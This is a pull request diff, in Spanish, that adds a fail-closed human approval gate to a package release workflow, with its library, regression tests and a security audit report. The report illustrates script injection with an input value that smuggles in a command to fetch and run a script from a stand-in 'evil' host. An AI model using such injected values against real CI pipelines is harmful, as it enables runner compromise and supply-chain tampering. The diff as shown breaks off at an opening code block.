### PR TITLE
fix(kernel): gate del release fail-closed + auditoría y sign-off de seguridad

### DIFF
--- a/.gitattributes
+++ b/.gitattributes
@@ -1,3 +1,8 @@
 
 # Shell scripts siempre con LF — bash no tolera CRLF
 *.sh text eol=lf
+
+# Workflows de GitHub Actions siempre con LF — los CRLF rompieron la
+# transformación del gate de publicación del kernel (#4695 · CRITICAL-1)
+*.yml text eol=lf
+*.yaml text eol=lf

--- a/.pipeline/bin/kernel-release.js
+++ b/.pipeline/bin/kernel-release.js
@@ -1,0 +1,236 @@
+#!/usr/bin/env node
+/**
+ * kernel-release.js — Publica el primer release firmado de @intrale/operating-kernel.
+ *
+ * Automatiza todo lo automatizable del workflow descrito en
+ * docs/pipeline/kernel-release-workflow.md (#4695 · CA-C0..CA-C4). Lo unico que
+ * NO automatiza —por diseno, es el gate humano— es la aprobacion del publish.
+ *
+ * Uso:
+ *   node .pipeline/bin/kernel-release.js              # dry-run: no toca nada
+ *   node .pipeline/bin/kernel-release.js --apply      # ejecuta de verdad
+ *   node .pipeline/bin/kernel-release.js --apply --gate=dispatch
+ *
+ * Gate humano (--gate):
+ *   environment  (default) job `publish` detras de `environment: release` con
+ *                required reviewers. Requiere plan de GitHub que habilite
+ *                environments protegidos en repos privados.
+ *   dispatch     sin trigger por tag: el workflow solo corre por workflow_dispatch
+ *                manual. El acto humano de dispararlo ES el gate. Fallback cuando
+ *                el plan no habilita environments protegidos.
+ *
+ * Fases: 0 prechecks · 1 lockfile · 2 workflow · 3 environment · 4 tag · 5 handoff
+ */
+'use strict';
+
+const { execFileSync, execSync } = require('child_process');
+const fs = require('fs');
+const os = require('os');
+const path = require('path');
+
+const { applyGate, assertGateSafety } = require(path.join(__dirname, '..', 'lib', 'kernel-release-gate.js'));
+
+const REPO = 'Intrale/kernel';
+const PKG = '@intrale/operating-kernel';
+const REVIEWER = 'leitolarreta';
+const PLATFORM_ROOT = path.resolve(__dirname, '..', '..');
+const PROPOSED_YML = path.join(PLATFORM_ROOT, 'docs', 'pipeline', 'kernel-release-workflow.proposed.yml');
+
+const args = process.argv.slice(2);
+const APPLY = args.includes('--apply');
+const GATE = (args.find((a) => a.startsWith('--gate=')) || '--gate=environment').split('=')[1];
+const SKIP_SIGNOFF = args.includes('--skip-signoff-check');
+
+const GH = process.env.GH_BIN || 'gh';
+const log = (m) => console.log(m);
+const step = (n, m) => console.log(`\n=== Fase ${n} · ${m} ===`);
+const ok = (m) => console.log(`  [ok] ${m}`);
+const warn = (m) => console.log(`  [!]  ${m}`);
+const fail = (m) => {
+  console.error(`\n[X] BLOQUEADO: ${m}`);
+  process.exit(1);
+};
+
+function sh(cmd, opts = {}) {
+  return execSync(cmd, { encoding: 'utf8', stdio: ['ignore', 'pipe', 'pipe'], ...opts }).trim();
+}
+function gh(argv, opts = {}) {
+  return execFileSync(GH, argv, { encoding: 'utf8', stdio: ['ignore', 'pipe', 'pipe'], ...opts }).trim();
+}
+function mutate(label, fn) {
+  if (!APPLY) {
+    log(`  [dry-run] ${label}`);
+    return null;
+  }
+  const r = fn();
+  ok(label);
+  return r;
+}
+
+// ─── Fase 0 · Prechecks ──────────────────────────────────────────────────────
+step(0, 'Prechecks (fail-closed)');
+
+if (!['environment', 'dispatch'].includes(GATE)) fail(`--gate invalido: ${GATE}`);
+
+let scopes = '';
+try {
+  scopes = execFileSync(GH, ['auth', 'status'], { encoding: 'utf8', stdio: ['ignore', 'pipe', 'pipe'] });
+} catch (e) {
+  scopes = String(e.stdout || '') + String(e.stderr || '');
+}
+if (!/write:packages/.test(scopes)) {
+  fail('El token de gh no tiene scope write:packages. Corre: gh auth refresh -h github.com -s write:packages');
+}
+ok('gh autenticado con write:packages');
+
+let perms;
+try {
+  perms = JSON.parse(gh(['api', `repos/${REPO}`, '--jq', '{admin:.permissions.admin,push:.permissions.push}']));
+} catch {
+  fail(`No se puede leer ${REPO} con el token actual.`);
+}
+if (!perms.admin) fail(`Se requiere admin sobre ${REPO} (crear environment / proteger main).`);
+ok(`admin sobre ${REPO}`);
+
+if (!fs.existsSync(PROPOSED_YML)) fail(`Falta el YAML propuesto: ${PROPOSED_YML}`);
+ok('YAML propuesto presente');
+
+// CA-C0: el release.yml NO se commitea sin sign-off de `security` sobre este YAML.
+const SIGNOFF_GLOBS = [
+  path.join(PLATFORM_ROOT, '.pipeline', 'assets', 'docs', '4695'),
+  path.join(PLATFORM_ROOT, 'docs', 'pipeline'),
+];
+const signoff = SIGNOFF_GLOBS.flatMap((dir) =>
+  fs.existsSync(dir)
+    ? fs.readdirSync(dir).filter((f) => /security.*(sign-?off|4695)|kernel-release.*sign-?off/i.test(f)).map((f) => path.join(dir, f))
+    : []
+);
+if (signoff.length) ok(`sign-off de security encontrado: ${path.basename(signoff[0])}`);
+else if (SKIP_SIGNOFF) warn('sign-off de security NO encontrado — omitido por --skip-signoff-check');
+else fail('CA-C0: no hay sign-off de `security` sobre kernel-release-workflow.proposed.yml. Corre /security sobre ese archivo, o pasa --skip-signoff-check si ya fue firmado fuera de banda.');
+
+// ─── Clone de trabajo ────────────────────────────────────────────────────────
+const work = path.join(os.tmpdir(), `kernel-release-${process.pid}`);
+log(`\n  workdir: ${work}`);
+if (APPLY) {
+  gh(['repo', 'clone', REPO, work, '--', '--depth', '50']);
+} else {
+  fs.mkdirSync(work, { recursive: true });
+  gh(['repo', 'clone', REPO, work, '--', '--depth', '50']); // read-only, seguro en dry-run
+}
+const inRepo = { cwd: work };
+const version = JSON.parse(fs.readFileSync(path.join(work, 'package.json'), 'utf8')).version;
+if (!/^\d+\.\d+\.\d+$/.test(version)) fail(`package.json.version no es pin exacto: ${version}`);
+ok(`version a publicar: ${PKG}@${version} (tag v${version})`);
+
+const existingTags = gh(['api', `repos/${REPO}/tags`, '--jq', '.[].name']).split('\n');
+if (existingTags.includes(`v${version}`)) {
+  warn(`El tag v${version} ya existe — bumpea package.json.version antes de re-publicar.`);
+}
+
+// ─── Fase 1 · Lockfile reproducible (npm ci lo exige) ────────────────────────
+step(1, 'package-lock.json + pin de optionalDependencies');
+const pkgPath = path.join(work, 'package.json');
+const pkg = JSON.parse(fs.readFileSync(pkgPath, 'utf8'));
+const wildcards = Object.entries(pkg.optionalDependencies || {}).filter(([, v]) => v === '*');
+if (wildcards.length) {
+  warn(`optionalDependencies con comodin "*": ${wildcards.map(([k]) => k).join(', ')}`);
+  mutate(`pinear ${wildcards.length} optionalDependencies a la version resuelta`, () => {
+    for (const [name] of wildcards) {
+      const v = sh(`npm view ${name} version`).trim();
+      pkg.optionalDependencies[name] = v;
+      log(`       ${name} -> ${v}`);
+    }
+    fs.writeFileSync(pkgPath, JSON.stringify(pkg, null, 2) + '\n');
+  });
+}
+if (!fs.existsSync(path.join(work, 'package-lock.json'))) {
+  warn('el kernel NO tiene package-lock.json — `npm ci` del workflow fallaria');
+  mutate('generar package-lock.json (npm install --package-lock-only)', () =>
+    sh('npm install --package-lock-only --ignore-scripts', inRepo)
+  );
+} else ok('package-lock.json ya presente');
+
+// ─── Fase 2 · release.yml en el repo del kernel ──────────────────────────────
+step(2, `release.yml (gate=${GATE})`);
+const rawYml = fs.readFileSync(PROPOSED_YML, 'utf8');
+// La transformacion normaliza CRLF y preserva comentarios; la asercion posterior
+// es la red fail-closed (auditoria 2026-07-26 · CRITICAL-1: los regex viejos
+// borraban el gate y dejaban vivo el auto-publish, en silencio).
+const yml = applyGate(rawYml, GATE);
+try {
+  assertGateSafety(yml, GATE);
+} catch (e) {
+  fail(`${e.message}\n    No se escribio ni se commiteo nada.`);
+}
+ok(GATE === 'dispatch'
+  ? 'verificado: sin trigger automatico — publicar exige disparo manual'
+  : 'verificado: el job publish quedo detras de environment: release');
+const ymlDest = path.join(work, '.github', 'workflows', 'release.yml');
+mutate(`escribir .github/workflows/release.yml en ${REPO}`, () => {
+  fs.mkdirSync(path.dirname(ymlDest), { recursive: true });
+  fs.writeFileSync(ymlDest, yml);
+});
+mutate('commit + push a main del kernel', () => {
+  sh('git add -A', inRepo);
+  sh(`git -c user.name="pipeline" -c user.email="pipeline@intrale" commit -m "Workflow de release firmado (#4695 CA-C0..CA-C4)"`, inRepo);
+  sh('git push origin HEAD:main', inRepo);
+});
+
+// ─── Fase 3 · Gate humano ────────────────────────────────────────────────────
+step(3, 'Gate humano de publicacion');
+if (GATE === 'environment') {
+  mutate(`crear environment "release" con required reviewer @${REVIEWER}`, () => {
+    const uid = gh(['api', `users/${REVIEWER}`, '--jq', '.id']);
+    const body = JSON.stringify({ reviewers: [{ type: 'User', id: Number(uid) }], deployment_branch_policy: null });
+    const planFail = () => {
+      // Sin required reviewers el environment NO es un gate: seria auto-publish
+      // disfrazado. Fail-closed y limpiamos el environment a medio crear.
+      try { gh(['api', '--method', 'DELETE', `repos/${REPO}/environments/release`]); } catch { /* noop */ }
+      fail('El plan de GitHub no habilita "required reviewers" en repos privados (verificado 2026-07-26).\n' +
+           '    Salidas: (a) hacer publico Intrale/kernel, (b) subir la org a GitHub Team,\n' +
+           '    (c) re-correr con --gate=dispatch (el disparo manual pasa a ser el gate humano).');
+    };
+    try {
+      execFileSync(GH, ['api', '--method', 'PUT', `repos/${REPO}/environments/release`, '--input', '-'], {
+        input: body, encoding: 'utf8', stdio: ['pipe', 'pipe', 'pipe'],
+      });
+    } catch (e) {
+      const msg = String(e.stdout || '') + String(e.stderr || '');
+      if (/billing plan|Upgrade|not available|403|422/i.test(msg)) planFail();
+      throw e;
+    }
+    // Verificacion post-creacion: el reviewer tiene que haber quedado registrado.
+    const reviewers = gh(['api', `repos/${REPO}/environments/release`, '--jq',
+      '[.protection_rules[]? | select(.type=="required_reviewers") | .reviewers[]?.reviewer.login] | join(",")']);
+    if (!reviewers.includes(REVIEWER)) planFail();
+  });
+} else {
+  // El gate es el disparo manual. Ya quedo verificado en la fase 2 que el
+  // workflow no tiene NINGUN trigger automatico, asi que este mensaje no puede
+  // mentir: si hubiera sobrevivido el `on.push`, la fase 2 habria abortado.
+  ok('gate = disparo manual del workflow (verificado en fase 2; no se crea environment)');
+}
+
+// ─── Fase 4 · Tag ────────────────────────────────────────────────────────────
+step(4, `Tag v${version}`);
+if (GATE === 'environment') {
+  mutate(`crear y pushear tag v${version} (dispara el workflow, pausa en el gate)`, () => {
+    sh(`git tag -a v${version} -m "Kernel operativo ${version}"`, inRepo);
+    sh(`git push origin v${version}`, inRepo);
+  });
+} else {
+  mutate(`crear y pushear tag v${version} (no dispara nada: gate=dispatch)`, () => {
+    sh(`git tag -a v${version} -m "Kernel operativo ${version}"`, inRepo);
+    sh(`git push origin v${version}`, inRepo);
+  });
+  log(`  Para publicar, corre:  gh workflow run release.yml -R ${REPO} -f tag=v${version}`);
+}
+
+// ─── Fase 5 · Handoff ────────────────────────────────────────────────────────
+step(5, 'Que queda por hacer (humano)');
+log(`  1. Aprobar/disparar el publish:  https://github.com/${REPO}/actions`);
+log(`  2. Verificar la firma cosign del release v${version} (comando en docs/pipeline/kernel-release-workflow.md).`);
+log(`  3. Cerrar el cutover en el producto:`);
+log(`       node .pipeline/bin/kernel-release.js --post   (pendiente: pobla integrity.sri en pipeline.config.json)`);
+log(`\n${APPLY ? 'APLICADO.' : 'DRY-RUN: no se modifico nada. Re-corre con --apply.'}`);

--- a/.pipeline/lib/__tests__/kernel-release-gate-4695.test.js
+++ b/.pipeline/lib/__tests__/kernel-release-gate-4695.test.js
@@ -1,0 +1,123 @@
+'use strict';
+/**
+ * Regresión de CRITICAL-1 (#4695 · auditoría 2026-07-26): la transformación del
+ * gate de publicación del kernel se rompía con finales de línea CRLF — borraba el
+ * gate humano y dejaba vivo el disparo automático por push de tag, en silencio.
+ *
+ * Los tests corren sobre el YAML REAL del repo, y la mitad lo hacen con el archivo
+ * convertido a CRLF a propósito: es la condición exacta que produjo el fallo.
+ */
+
+const assert = require('assert');
+const fs = require('fs');
+const path = require('path');
+
+const { applyGate, assertGateSafety, normalizeEol, dropChildBlock } =
+  require(path.join(__dirname, '..', 'kernel-release-gate.js'));
+
+const PROPOSED_YML = path.join(__dirname, '..', '..', '..', 'docs', 'pipeline', 'kernel-release-workflow.proposed.yml');
+
+const REAL_LF = normalizeEol(fs.readFileSync(PROPOSED_YML, 'utf8'));
+const REAL_CRLF = REAL_LF.replace(/\n/g, '\r\n');
+
+const tests = [];
+const test = (name, fn) => tests.push([name, fn]);
+
+// ─── El fallo original, en las dos codificaciones ────────────────────────────
+
+for (const [eol, source] of [['LF', REAL_LF], ['CRLF', REAL_CRLF]]) {
+  test(`gate=dispatch elimina el trigger por push de tag (${eol})`, () => {
+    const out = applyGate(source, 'dispatch');
+    assert.ok(!/^\s+push:/m.test(out), 'el trigger on.push sobrevivio a la transformacion');
+    assert.ok(!/v\[0-9\]\+\.\[0-9\]\+\.\[0-9\]\+/.test(out), 'el filtro de tags sobrevivio');
+    assert.ok(/workflow_dispatch:/.test(out), 'se perdio workflow_dispatch: el workflow quedaria inejecutable');
+  });
+
+  test(`gate=dispatch pasa la verificacion fail-closed (${eol})`, () => {
+    assert.strictEqual(assertGateSafety(applyGate(source, 'dispatch'), 'dispatch'), true);
+  });
+
+  test(`gate=environment conserva el gate humano y el trigger (${eol})`, () => {
+    const out = applyGate(source, 'environment');
+    assert.ok(/^\s+environment: release/m.test(out), 'se perdio el environment: release');
+    assert.ok(/^\s+push:/m.test(out), 'se perdio el trigger por tag');
+    assert.strictEqual(assertGateSafety(out, 'environment'), true);
+  });
+
+  test(`la salida siempre queda en LF (${eol})`, () => {
+    assert.ok(!applyGate(source, 'dispatch').includes('\r'), 'quedaron CR en la salida');
+  });
+}
+
+// ─── La aserción tiene que RECHAZAR la combinación exacta del bug ────────────
+
+test('assertGateSafety rechaza gate=dispatch con el trigger push vivo', () => {
+  // Reproduce el bug: se saca el environment pero se deja el push (lo que hacian
+  // los regex viejos sobre un archivo CRLF).
+  const roto = REAL_LF.replace(/^    environment: release.*$/m, '    # gate humano = disparo manual');
+  assert.throws(
+    () => assertGateSafety(roto, 'dispatch'),
+    /on\.push` sigue presente/,
+    'la asercion dejo pasar un workflow que publicaria solo'
+  );
+});
+
+test('assertGateSafety rechaza gate=environment sin environment en publish', () => {
+  const roto = REAL_LF.replace(/^    environment: release.*$/m, '    # sin gate');
+  assert.throws(() => assertGateSafety(roto, 'environment'), /no declara `environment: release`/);
+});
+
+test('assertGateSafety rechaza un workflow sin ningun trigger', () => {
+  const sinDispatch = dropChildBlock(dropChildBlock(REAL_LF, 'on', 'push').yml, 'on', 'workflow_dispatch').yml;
+  assert.throws(() => assertGateSafety(sinDispatch, 'dispatch'), /workflow_dispatch/);
+});
+
+// ─── Invariantes de seguridad del YAML propuesto (HIGH-1 / HIGH-2) ──────────
+
+test('ningun run: interpola ${{ }} (HIGH-1 · script injection)', () => {
+  assert.strictEqual(assertGateSafety(REAL_LF, 'environment'), true);
+});
+
+test('las tres actions estan pineadas por SHA de 40 (HIGH-2)', () => {
+  const uses = REAL_LF.split('\n').filter((l) => /^\s+uses:/.test(l));
+  assert.ok(uses.length >= 3, `se esperaban al menos 3 actions, hay ${uses.length}`);
+  for (const u of uses) {
+    assert.ok(/@[0-9a-f]{40}\s*(#.*)?$/.test(u.trim()), `action sin pin por SHA: ${u.trim()}`);
+  }
+});
+
+test('el tarball se empaqueta una sola vez y se publica ese mismo (MEDIUM-1)', () => {
+  assert.ok(/npm publish "\$BLOB"/.test(REAL_LF), 'npm publish no usa el tarball empaquetado');
+  assert.strictEqual((REAL_LF.match(/npm pack/g) || []).length, 1, 'npm pack aparece mas de una vez');
+});
+
+test('el job publish no ejecuta scripts de dependencias de terceros (MEDIUM-3)', () => {
+  const ci = REAL_LF.split('\n').filter((l) => /npm ci\b/.test(l));
+  assert.ok(ci.length >= 1, 'no se encontro el paso npm ci');
+  for (const l of ci) {
+    assert.ok(
+      /--ignore-scripts/.test(l),
+      `npm ci sin --ignore-scripts en el job que firma y publica: ${l.trim()}`
+    );
+  }
+});
+
+test('el input tag se valida contra semver antes de cualquier checkout (MEDIUM-2)', () => {
+  assert.ok(/\^v\[0-9\]\+\\\.\[0-9\]\+\\\.\[0-9\]\+\$/.test(REAL_LF), 'falta la validacion de formato del tag');
+  assert.ok(/ref: refs\/tags\//.test(REAL_LF), 'el checkout no usa la ref calificada refs/tags/');
+});
+
+// ─── Runner ─────────────────────────────────────────────────────────────────
+
+let failed = 0;
+for (const [name, fn] of tests) {
+  try {
+    fn();
+    console.log(`  ok   ${name}`);
+  } catch (e) {
+    failed++;
+    console.error(`  FAIL ${name}\n       ${e.message.split('\n')[0]}`);
+  }
+}
+console.log(`\n${tests.length - failed}/${tests.length} tests OK`);
+process.exit(failed ? 1 : 0);

--- a/.pipeline/lib/kernel-release-gate.js
+++ b/.pipeline/lib/kernel-release-gate.js
@@ -1,0 +1,170 @@
+'use strict';
+/**
+ * kernel-release-gate.js — Transformación y verificación fail-closed del gate
+ * humano del workflow de release del kernel (#4695 · CA-C0/CA-C1).
+ *
+ * Contexto (auditoría 2026-07-26, finding CRITICAL-1): la transformación
+ * `--gate=dispatch` se hacía con dos regex que exigían `\n` literal. El YAML está
+ * guardado con CRLF, así que el regex del trigger NO matcheaba (el `on: push` por
+ * tag sobrevivía) y el del environment SÍ (el gate humano se borraba). Resultado:
+ * se quitaba el gate y se conservaba el auto-publish — exactamente al revés — y el
+ * script imprimía `[ok] gate = disparo manual`, así que el fallo era silencioso.
+ *
+ * Este módulo separa las dos responsabilidades:
+ *   · applyGate()        — edición textual tolerante a CRLF (preserva comentarios).
+ *   · assertGateSafety() — verificación estructural sobre el YAML parseado. Es la
+ *                          red fail-closed: si la transformación no dejó un gate
+ *                          efectivo, tira y el llamador NO debe escribir el archivo.
+ *
+ * Los dos modos de gate:
+ *   environment — el job `publish` queda detrás de `environment: release` con
+ *                 required reviewers. GitHub pausa el job hasta la aprobación.
+ *   dispatch    — se elimina el trigger por push de tag: el workflow sólo corre por
+ *                 `workflow_dispatch`. El acto humano de dispararlo ES el gate.
+ *                 Fallback para planes de GitHub sin environments protegidos.
+ *
+ * En AMBOS modos tiene que ser imposible que un push de tag publique solo.
+ */
+
+const GATES = ['environment', 'dispatch'];
+
+/** Normaliza CRLF/CR a LF. Todo lo demás asume LF. */
+function normalizeEol(yml) {
+  return String(yml).replace(/\r\n/g, '\n').replace(/\r/g, '\n');
+}
+
+/**
+ * Borra una clave hija de un mapping de primer nivel, con todo su sub-bloque.
+ * Ej: dropChildBlock(yml, 'on', 'push') elimina `  push:` y sus líneas indentadas.
+ * Devuelve `{ yml, removed }` — `removed` es false si la clave no estaba.
+ */
+function dropChildBlock(yml, parentKey, childKey) {
+  const lines = normalizeEol(yml).split('\n');
+  const parentIdx = lines.findIndex((l) => new RegExp(`^${parentKey}:\\s*(#.*)?$`).test(l));
+  if (parentIdx === -1) return { yml, removed: false };
+
+  let childIdx = -1;
+  let childIndent = 0;
+  for (let i = parentIdx + 1; i < lines.length; i++) {
+    const line = lines[i];
+    if (/^\s*$/.test(line)) continue;
+    const indent = line.length - line.trimStart().length;
+    if (indent === 0) break; // salimos del mapping del padre
+    if (new RegExp(`^\\s+${childKey}:\\s*(#.*)?$`).test(line)) {
+      childIdx = i;
+      childIndent = indent;
+      break;
+    }
+  }
+  if (childIdx === -1) return { yml, removed: false };
+
+  let end = childIdx + 1;
+  while (end < lines.length) {
+    const line = lines[end];
+    if (/^\s*$/.test(line)) { end++; continue; }
+    const indent = line.length - line.trimStart().length;
+    if (indent <= childIndent) break;
+    end++;
+  }
+  lines.splice(childIdx, end - childIdx);
+  return { yml: lines.join('\n'), removed: true };
+}
+
+/** Comenta la línea `environment: <x>` del job indicado. */
+function commentOutEnvironment(yml, note) {
+  const lines = normalizeEol(yml).split('\n');
+  const idx = lines.findIndex((l) => /^\s+environment:\s*release\b/.test(l));
+  if (idx === -1) return { yml: lines.join('\n'), removed: false };
+  const indent = lines[idx].slice(0, lines[idx].length - lines[idx].trimStart().length);
+  lines[idx] = `${indent}# ${note}`;
+  return { yml: lines.join('\n'), removed: true };
+}
+
+/**
+ * Aplica el modo de gate al YAML. Siempre devuelve LF.
+ * No verifica nada: la verificación es responsabilidad de assertGateSafety().
+ */
+function applyGate(yml, gate) {
+  if (!GATES.includes(gate)) throw new Error(`gate invalido: ${gate}`);
+  let out = normalizeEol(yml);
+  if (gate === 'dispatch') {
+    const dropped = dropChildBlock(out, 'on', 'push');
+    out = dropped.yml;
+    out = commentOutEnvironment(out, 'gate humano = disparo manual (workflow_dispatch)').yml;
+  }
+  return out;
+}
+
+function loadYaml(yml) {
+  // eslint-disable-next-line global-require
+  const jsYaml = require('js-yaml');
+  const doc = jsYaml.load(normalizeEol(yml));
+  if (!doc || typeof doc !== 'object') throw new Error('el workflow no parsea como mapping YAML');
+  // YAML 1.1 interpreta `on` como booleano true; js-yaml 4 (core schema) no, pero
+  // no dependemos de eso: aceptamos las dos formas.
+  const triggers = Object.prototype.hasOwnProperty.call(doc, 'on') ? doc.on : doc[true];
+  return { doc, triggers };
+}
+
+/**
+ * Verificación fail-closed del resultado. Tira Error con TODOS los problemas
+ * encontrados. El llamador no debe escribir ni commitear si esto tira.
+ */
+function assertGateSafety(yml, gate) {
+  if (!GATES.includes(gate)) throw new Error(`gate invalido: ${gate}`);
+  const problems = [];
+  const { doc, triggers } = loadYaml(yml);
+
+  if (!triggers || typeof triggers !== 'object') {
+    problems.push('el workflow no declara triggers (`on:`)');
+  }
+  const jobs = doc.jobs || {};
+  const publish = jobs.publish;
+  if (!publish) problems.push('no existe el job `publish`');
+
+  const hasPushTrigger = !!(triggers && triggers.push);
+  const hasDispatch = !!(triggers && Object.prototype.hasOwnProperty.call(triggers, 'workflow_dispatch'));
+
+  if (gate === 'dispatch') {
+    // El gate ES el disparo manual ⇒ ningún trigger automático puede sobrevivir.
+    if (hasPushTrigger) {
+      problems.push('gate=dispatch pero el trigger `on.push` sigue presente: un push de tag publicaria SOLO');
+    }
+    if (!hasDispatch) {
+      problems.push('gate=dispatch pero no hay `workflow_dispatch`: el workflow quedaria sin forma de dispararse');
+    }
+    const autoTriggers = Object.keys(triggers || {}).filter((k) => k !== 'workflow_dispatch');
+    if (autoTriggers.length) {
+      problems.push(`gate=dispatch con triggers automaticos remanentes: ${autoTriggers.join(', ')}`);
+    }
+  } else {
+    // El gate es el environment protegido ⇒ tiene que estar en el job publish.
+    if (publish && publish.environment !== 'release' && (publish.environment || {}).name !== 'release') {
+      problems.push('gate=environment pero el job `publish` no declara `environment: release`');
+    }
+  }
+
+  // Invariantes comunes a los dos modos.
+  if (doc.permissions && doc.permissions.contents && doc.permissions.contents !== 'read') {
+    problems.push(`permisos de workflow demasiado amplios: contents=${doc.permissions.contents}`);
+  }
+  for (const [jobName, job] of Object.entries(jobs)) {
+    for (const step of (job && job.steps) || []) {
+      if (typeof step.run === 'string' && step.run.includes('${{')) {
+        problems.push(`inyeccion: el step "${step.name || step.id || '?'}" del job ${jobName} interpola \${{ }} dentro de run:`);
+      }
+      if (typeof step.uses === 'string' && step.uses.includes('@') && !/@[0-9a-f]{40}$/.test(step.uses)) {
+        problems.push(`action sin pin por SHA en el job ${jobName}: ${step.uses}`);
+      }
+    }
+  }
+
+  if (problems.length) {
+    const err = new Error(`El workflow transformado NO es seguro (gate=${gate}):\n  - ${problems.join('\n  - ')}`);
+    err.problems = problems;
+    throw err;
+  }
+  return true;
+}
+
+module.exports = { GATES, normalizeEol, dropChildBlock, applyGate, assertGateSafety };

--- a/docs/pipeline/kernel-release-workflow-auditoria-seguridad.md
+++ b/docs/pipeline/kernel-release-workflow-auditoria-seguridad.md
@@ -1,0 +1,234 @@
+# Auditoría de seguridad — `kernel-release-workflow.proposed.yml` (#4695 · CA-C0)
+
+> **⚠️ SUPERADO (2026-07-26).** Los findings de este informe **fueron remediados y re-verificados**.
+> El sign-off se otorgó en [`kernel-release-workflow-security-signoff.md`](kernel-release-workflow-security-signoff.md).
+> Este documento se conserva como registro del estado bloqueado y de la remediación exigida —
+> **no** refleja el estado actual del workflow.
+
+> **Veredicto original: 🔴 BLOQUEADO.** No se otorgaba el sign-off de CA-C0.
+> El archivo **no se commitea** al repo del kernel y el release **no se publica** hasta remediar
+> el finding CRITICAL y los dos HIGH.
+>
+> **Nombre del archivo elegido a propósito:** este documento **NO** matchea el patrón que
+> `.pipeline/bin/kernel-release.js` busca para dar por cumplido CA-C0
+> (`/security.*(sign-?off|4695)|kernel-release.*sign-?off/i`). Un informe con veredicto negativo
+> no debe destrabar el precheck. El sign-off aprobatorio se emitirá, con ese nombre, sólo cuando
+> los findings estén cerrados.
+
+- **Alcance:** `docs/pipeline/kernel-release-workflow.proposed.yml` + la transformación
+  `--gate=dispatch` que `.pipeline/bin/kernel-release.js` aplica sobre él antes de commitearlo.
+- **Fecha:** 2026-07-26
+- **Auditor:** `/security`
+
+---
+
+## Resumen
+
+| Severidad | Cantidad |
+|-----------|----------|
+| Critical  | 1 |
+| High      | 2 |
+| Medium    | 2 |
+| Low       | 1 |
+
+El YAML **como está escrito en el repo del producto** es razonable: permisos mínimos a nivel
+workflow, elevación por job, sin PAT de larga vida, firma keyless. El problema grave **no está en
+el YAML sino en cómo se lo transforma** antes de instalarlo en el repo del kernel: la ruta
+`--gate=dispatch` produce un workflow **sin ningún gate humano y con disparo automático**.
+
+---
+
+## Findings
+
+### 🔴 CRITICAL-1 · `--gate=dispatch` deja el publish sin gate y con disparo automático (A01, A08)
+
+**Dónde:** `.pipeline/bin/kernel-release.js` (fase 2, transformación del YAML) →
+`docs/pipeline/kernel-release-workflow.proposed.yml:31-34` y `:88`.
+
+El script aplica dos reemplazos para el modo `dispatch`:
+
+```js
+yml
+  .replace(/^on:\n  push:\n    tags:\n      - 'v\[0-9\]\+\.\[0-9\]\+\.\[0-9\]\+'\n/m, 'on:\n')
+  .replace(/^    environment: release.*$/m, '    # gate humano = disparo manual (workflow_dispatch)')
+```
+
+**El archivo está guardado con finales de línea CRLF.** El primer regex exige `\n` literal entre
+líneas, así que **no matchea** y el trigger por push de tag **sobrevive**. El segundo regex sí
+matchea (`.*` consume el `\r`) y **elimina el `environment: release`** del job `publish`.
+
+Resultado verificado ejecutando la transformación real sobre el archivo real:
+
+```
+=== JOB publish tras transformacion gate=dispatch ===
+    needs: verify
+    runs-on: ubuntu-latest
+    # gate humano = disparo manual (workflow_dispatch)   ← el gate se fue
+    permissions:
+      contents: write
+      packages: write
+      id-token: write
+
+=== trigger on: ===
+on:
+  push:
+    tags:
+      - 'v[0-9]+.[0-9]+.[0-9]+'      ← el disparo automático sigue vivo
+  workflow_dispatch:
+    ...
+```
+
+Es la combinación exactamente inversa a la buscada: **se quita el gate y se conserva el
+auto-disparo**. La fase 4 del propio script pushea el tag `vX.Y.Z` → eso dispara `publish` de
+inmediato, con `contents: write` + `packages: write` + `id-token: write`, **sin ninguna aprobación
+humana**. Viola CA-C1 ("sin auto-publish") y el principio fail-closed de los gates de firma del
+operador (`docs/pipeline/gates-firma-operador.md`): un ítem gateado degradaría a automático por un
+bug de line endings.
+
+Agravante: el fallo es **silencioso**. El script imprime `[ok] gate = disparo manual del workflow`
+y el operador queda convencido de que hay un gate.
+
+**Remediación (obligatoria antes de publicar):**
+1. Normalizar line endings antes de transformar: `yml = yml.replace(/\r\n/g, '\n')`.
+2. Reemplazar los regex frágiles por una edición estructural del YAML (parsear con `js-yaml`,
+   borrar `on.push` y `jobs.publish.environment`, re-serializar) — o, como mínimo, regex
+   tolerantes a `\r?\n`.
+3. **Verificación post-transformación fail-closed:** antes de escribir el archivo, assertear que
+   el resultado no contiene `on.push.tags` y que el modo elegido dejó un gate efectivo. Si la
+   aserción falla → abortar, no commitear.
+4. Agregar un test de regresión que corra la transformación sobre el YAML real (con CRLF) y
+   verifique ambas propiedades.
+
+---
+
+### 🟠 HIGH-1 · Script injection vía `${{ github.event.inputs.tag }}` interpolado en `run:` (A03)
+
+**Dónde:** `kernel-release-workflow.proposed.yml:68`
+
+```yaml
+run: |
+  REF="${{ github.event.inputs.tag || github.ref_name }}"
+```
+
+GitHub interpola la expresión **como texto, antes** de ejecutar el shell. `tag` es un input libre
+de `workflow_dispatch`. Un valor como `v1.0.0"; curl -s https://evil/x.sh | sh; #` ejecuta comandos
+arbitrarios en el runner.
+
+El blast radius directo es acotado (`verify` corre con `contents: read` y
+`persist-credentials: false`), pero `verify` **es el control que valida `tag == package.json.version`**:
+comprometerlo desactiva CA-C1. Y con CRITICAL-1 sin corregir, `publish` corre a continuación con
+permisos elevados.
+
+**Remediación:** pasar el valor por `env:` y referenciarlo como variable de shell — nunca
+interpolar en el cuerpo del `run:`.
+
+```yaml
+- id: check
+  env:
+    REF: ${{ github.event.inputs.tag || github.ref_name }}
+  run: |
+    set -euo pipefail
+    TAG_VERSION="${REF#v}"
+```
+
+Aplica igual a las líneas 119 y 132 por consistencia (ahí el valor ya viene validado por regex en
+`verify`, así que es defensa en profundidad, no un agujero).
+
+---
+
+### 🟠 HIGH-2 · Actions de terceros sin pinear por SHA (A08)
+
+**Dónde:** líneas 60, 95, 100, 113 — `actions/checkout@v4`, `actions/setup-node@v4`,
+`sigstore/cosign-installer@v3`.
+
+Los tags de release son **mutables**: quien controle el repo de la action (o su compromiso) puede
+mover `v3` a otro commit. `sigstore/cosign-installer` corre dentro del job que tiene
+`id-token: write` y `packages: write` — es decir, el que firma y publica el kernel. Un tag movido
+compromete la firma y el paquete.
+
+Contradice, además, la propia doctrina del kernel: `kernel-updates.md` §2 exige **pin de versión
+exacto y prohíbe `latest` implícito** para el artefacto publicado; el workflow que lo publica no se
+aplica la misma regla.
+
+**Remediación:** pinear las tres actions al SHA de commit, con la versión legible en comentario:
+
+```yaml
